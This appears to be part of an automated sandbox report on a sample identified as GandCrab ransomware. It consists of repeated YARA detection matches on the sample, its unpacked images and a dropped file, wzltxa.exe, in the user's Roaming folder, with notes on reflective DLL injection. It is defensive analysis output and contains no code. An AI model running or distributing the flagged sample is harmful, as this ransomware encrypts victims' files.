Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs

Source: mPNVrHIpyt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
